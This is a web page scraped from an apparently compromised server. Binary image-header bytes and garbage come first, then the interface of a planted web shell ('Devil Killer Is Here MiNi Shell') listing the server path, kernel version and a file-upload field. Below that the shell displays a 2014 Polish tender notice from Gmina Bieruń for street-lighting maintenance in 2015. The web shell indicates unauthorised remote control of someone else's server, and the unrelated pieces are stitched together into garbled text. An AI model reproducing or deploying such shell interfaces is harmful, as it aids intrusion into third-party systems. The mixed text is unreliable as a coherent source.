JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141211/406682-N-2014.html

<p class="kh_header"><b>Bieruń: Konserwacja oświetlenia ulicznego na obwodach wydzielonych i sieci nN w Gminie Bieruń w 2015r</b><br>
<b>Numer ogłoszenia: 406682 - 2014; data zamieszczenia: 11.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego na obwodach wydzielonych i sieci nN w Gminie Bieruń w 2015r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  Konserwacja oświetlenia ulicznego na obwodach wydzielonych  i  sieci nN w Gminie Bieruń w 2015r. polegająca na utrzymaniu sprawności technicznej instalacji oświetlenia ulicznego wraz z przynależną infrastrukturą techniczną, zgodnie z wymogami obowiązujących przepisów, Polskich Norm i ogólnie przyjętych zasad technicznych:
- na obwodach oświetleniowych wydzielonych (słupy oświetleniowe wraz z oprawami oświetleniowymi i instalacją zasilającą  stanowiące własność Gminy Bieruń) w ilości 1212 opraw oświetleniowych zabudowanych na 1143 słupach oświetleniowych
- na obwodach oświetleniowych  skojarzonych z siecią nN (oprawy oświetleniowe będące własnością Gminy Bieruń i zabudowane na słupach napowietrznej sieci nN będącej własnością firmy TAURON Dystrybucja S.A.) w ilości 360 opraw oświetleniowych.

2.Szczegółową lokalizację punktów (opraw) oświetleniowych  i słupów oświetleniowych na obwodach wydzielonych i sieci nN na terenie Gminy Bieruń zawiera załącznik  do SIWZ.
3.Wykonawca utrzymuje sprawność techniczną instalacji oświetlenia ulicznego poprzez:
a) wykonywanie napraw awaryjnych na obwodach wydzielonych (1212 punktów  
     (opraw) oświetleniowych)  , obejmujących w szczególności:
- wymianę uszkodzonych / zużytych  źródeł światła w oprawach oświetleniowych (za 
    wyjątkiem źródeł światła typu LED),
- wymianę / naprawę uszkodzonych układów stabilizująco-zapłonowych 
   (stateczników, zapłonników),
- wymianę wkładek bezpiecznikowych w słupie oświetleniowym i w szafie zasilającej 
   oświetlenia ulicznego,
- wymianę uszkodzonych opraw bezpiecznikowych w słupie oświetleniowym i szafie 
   zasilającej oświetlenia ulicznego
- wymianę / naprawę uszkodzonych złącz słupowych, 
- wymianę / naprawę uszkodzonych złącz bezpiecznikowych, fazowych i zerowych,
- naprawę / wymianę uszkodzonych przewodów w słupie,
- naprawę uszkodzonych drzwiczek wnęk słupowych,
- usunięcie uszkodzenia układu zasilania i sterowania w szafach zasilających 
   oświetlenia ulicznego,
- wykonywanie nastaw urządzeń sterujących oświetleniem,
- naprawę uszkodzonej oprawy oświetleniowej,
- naprawę uszkodzonego wysięgnika,
- lokalizację i kompleksową usuwanie uszkodzeń na kablach ziemnych,

b) wykonywanie usług konserwacyjnych  na obwodach wydzielonych (1212 
     punktów (opraw) oświetleniowych), obejmujących w szczególności:
-  przeprowadzanie nocnych przeglądów instalacji oświetleniowej, - 2 razy w 
    miesiącu,
- wymianę uszkodzonych / uzupełnienie brakujących drzwiczek wnęki słupowej lub 
   zabudowę osłony izolacyjnej wnęki słupa (dla słupów starego typu nie 
   produkowanych) - 20 szt.,
- czyszczenie opraw oświetleniowych wraz z kloszem i wysięgnikiem - 250 szt.

c) wykonywanie napraw awaryjnych na sieci nN (360 punktów (opraw) 
    oświetleniowych) , obejmujących w szczególności:
- wymianę uszkodzonych / zużytych  źródeł światła w oprawach oświetleniowych (za 
   wyjątkiem źródeł światła typu LED),
- wymianę / naprawę uszkodzonych układów stabilizująco-zapłonowych 
  (stateczników, zapłonników),
- wymianę wkładek bezpiecznikowych  na słupie oświetleniowym i w szafie zasilającej 
   oświetlenia ulicznego,
- wymianę uszkodzonych opraw bezpiecznikowych  na słupie oświetleniowym i szafie 
   zasilającej oświetlenia ulicznego
- naprawę / wymianę uszkodzonych przewodów zasilających oprawę oświetleniową z 
  sieci nN,
- usunięcie uszkodzenia układu zasilania i sterowania w szafach zasilających 
  oświetlenia ulicznego,
- wykonywanie nastaw urządzeń sterujących oświetleniem,
- naprawę uszkodzonej oprawy oświetleniowej,
- naprawę uszkodzonego wysięgnika,
- lokalizację i kompleksową usuwanie uszkodzeń na kablach ziemnych,


d) wykonywanie usług konserwacyjnych na sieci nN (360 punktów (opraw) 
    oświetleniowych), obejmujących w szczególności:
-  przeprowadzanie nocnych przeglądów instalacji oświetleniowej - 2 razy w  
    miesiącu,
- czyszczenie opraw oświetleniowych wraz z kloszem i wysięgnikiem - 50 szt.

4.Wykonawca jest zobowiązany wykonać naprawę awaryjną (usunąć awarię)       instalacji elektrycznej oświetlenia w następujących terminach:
a) w przypadkach:
     - stwarzających zagrożenie porażeniem prądem elektrycznym  dla  osób 
        postronnych (przechodniów),
     - skutkujących    brakiem    oświetlenia    ciągów   ulicznych / stref    w    ilości     
       powyżej    9   opraw oświetleniowych,
     - polegającej  na  awarii  układu  sterowania  lampami  powodującej  świecenie 
        lamp poza  ustalonym programem urządzeń sterujących (świecenie w ciągu 
        dnia),do 12 godzin od otrzymania zgłoszenia od zamawiającego.

b) w przypadkach:
    -  naprawy awaryjnej polegającej na usuwaniu uszkodzeń na kablach ziemnych instalacji oświetleniowej, wymagających odkrycia terenu,  7 dni kalendarzowych od dnia zgłoszenia. 
c) w przypadkach:
    - naprawy  awaryjnej instalacji oświetlenia, w tym wyszczególnionych w pkt 3 a) i pkt 3c) max.  do 3 dni od dnia zgłoszenia (termin wykonania naprawy jest elementem  oceny ofert).

d) w przypadkach:
    - usług konserwacyjnych sieci oświetleniowej,  do 7 dni kalendarzowych od dnia zgłoszeniu potrzeb ich wykonania przez zamawiającego.
5. Umowa nie obejmuje wykonywania napraw awaryjnych będących skutkiem wypadków komunikacyjnych, dewastacji bądź kradzieży instalacji oświetlenia ulicznego.

6.Przy realizacji umowy wykonawca zobowiązany jest do przestrzegania 
   obowiązujących  przepisów bezpieczeństwa i higieny pracy, a w szczególności:
- do wykonywania prac zatrudniać wyłącznie osoby które odbyły wymagane 
  obowiązującymi przepisami szkolenia, instruktarze BHP oraz posiadają ważne 
  zaświadczenie lekarskie o zdolności do pracy,
- do wykonywania prac szczególnie niebezpiecznych (prace na wysokości, prace przy 
  urządzeniach elektrycznych, obsługa specjalistycznego sprzętu i urządzeń, prace w 
  pasie drogowym) zatrudniać wyłącznie osoby posiadające właściwe kwalifikacje, 
  uprawnienia, upoważnienia,
- opracować, zatwierdzić z odpowiednimi właścicielami dróg (drogi krajowe, 
   powiatowe, gminne) projekt / projekty organizacji ruchu drogowego przy usuwaniu 
   awarii sieci elektrycznej oraz zapoznać z jego treścią osoby realizujące usługę .

7.Wykonawca jest obowiązany organizować prace przy naprawie i konserwacji 
   instalacji elektrycznej oświetlenia ulicznego zgodnie z wymaganiami:
- rozporządzenia Ministra Gospodarki  z dnia 23.04.2014r. w sprawie bezpieczeństwa 
  i higieny pracy przy urządzeniach energetycznych,
- Instrukcją Ruchu i Eksploatacji Sieci Dystrybucyjnej (IRiESD) właściciela sieci 
   dystrybucyjnej nN, firmy TAUROUN Dystrybucja S.A.

8. Przy wykonywaniu napraw awaryjnych i usług konserwacyjnych instalacji oświetleniowy  na sieci napowietrznej nN lub wymagających dostępu do urządzeń elektrycznych i elektroenergetycznych będących we władaniu właściciela sieci dystrybucyjnej, firmy TAURON Dystrybucja S.A., Wykonawca zobowiązany jest do uzgodnienia  prac z odpowiednimi służbami technicznymi TAURON Dystrybucja S.A. 

    9. Pozostałe wymagania w zakresie realizacji zamówienia, w tym: 
     - terminy wykonywania poszczególnych napraw awaryjnych i usług  
       konserwacyjnych,
    - sposoby komunikowania się Wykonawcy i Zamawiającego,
    - odbioru i rozliczania usługi,
      zawiera również wzór umowy stanowiący załącznik do SIWZ.
   10. Zamawiający nie przewiduje zamówień uzupełniających, dynamicznego systemu  
          zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp 
          oraz  udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, 
          o których mowa w art. 29 ust. 4 ustawy pzp. Zamawiający nie dokonuje zastrzeżenia, 
          o którym mowa w art. 36a ust.2 pkt 1 ustawy pzp. Zamawiający nie dopuszcza  
          składania ofert częściowych, wariantowych.

  11. Kody Wspólnego Słownika Zamówień CPV:
        50232100-1  Usługi w zakresie konserwacji oświetlenia ulicznego
           50232110-4   Obsługa instalacji oświetlenia publicznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1, 50.23.21.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości 1500,00 zł (słownie: tysiąc pięćset złotych 00/100) musi być wniesione w terminie, który został podany w SIWZ punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego wykonawcy na rachunek bankowy zamawiającego w BS O/Tychy numer konta: 26 8435 0004 0000 0000 6158 0001 z adnotacją:
Wadium - Przetarg nieograniczony na wybór wykonawcy zamówienia pn. Konserwacja oświetlenia ulicznego.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 11:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu (I piętro, pokój nr 8, segment B) nie później niż do godz. 11:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
W przypadku przesyłania wadium pocztą, należy na opakowaniu umieścić zapis:
Wadium do przetargu (nazwa postępowania). 
Należy przekazać do kasy Urzędu Miejskiego w Bieruniu, 43-150 Bieruń, Rynek 14 do godz.11:00 (wpisać dzień składania ofert).
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. (Dz.U.2007.42.275 z późniejszymi zmianami) o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Z treści gwarancji i poręczeń, o których mowa w art. 45 ust. 6 pkt 2 - 5 ustawy pzp musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie zamawiającego, zobowiązanie gwaranta do zapłaty na rzecz zamawiającego kwoty określonej 
w gwarancji, w sytuacjach, o których mowa w art. 46 ust. 4a i 5 ustawy pzp.
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz 
z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się 
o udzielenie nin. zamówienia, należy informacyjnie wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw 
i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy pzp.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione 
w terminie określonym przez zamawiającego.

3. Utrata wadium
Zgodnie z zastrzeżeniem art. 46 ust. 4a, zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
Ponadto zgodnie z art. 46 ust. 5 ustawy pzp zamawiający zatrzymuje wadium wraz 
z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, spełniający warunki dotyczące:

	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.                                                                                                       
 
           Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na  
           podstawie przedłożonego przez wykonawcę:
     - oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, spełniający warunki dotyczące:
2)	Posiadania wiedzy i doświadczenia:

Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, spełniający warunki dotyczące:
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, spełniający warunki dotyczące:
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, spełniający warunki dotyczące:
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A).1).	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej dostarcza oświadczenia wymienione w SIWZ w pkt. V A. Listy wymaganych oświadczeń i dokumenty wymienione w pkt.V.B  Listy wymaganych dokumentów.
Zamiast dokumentu, o którym mowa w punkcie 1) Listy wymaganych dokumentów,  wykonawca przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa wyżej.
2)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
     3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych  podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
4)   Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu  
             trzeciego,  którymi wykonawca będzie dysponował przy realizacji zamówienia),
         -  czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie 
             wykonane przy realizacji zamówienia (w realizacji której części zamówienia będzie 
             brał udział podmiot trzeci i w jakiej formie np. podwykonawstwo),
         -  jakiego okresu dotyczy zobowiązanie.
         W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. 
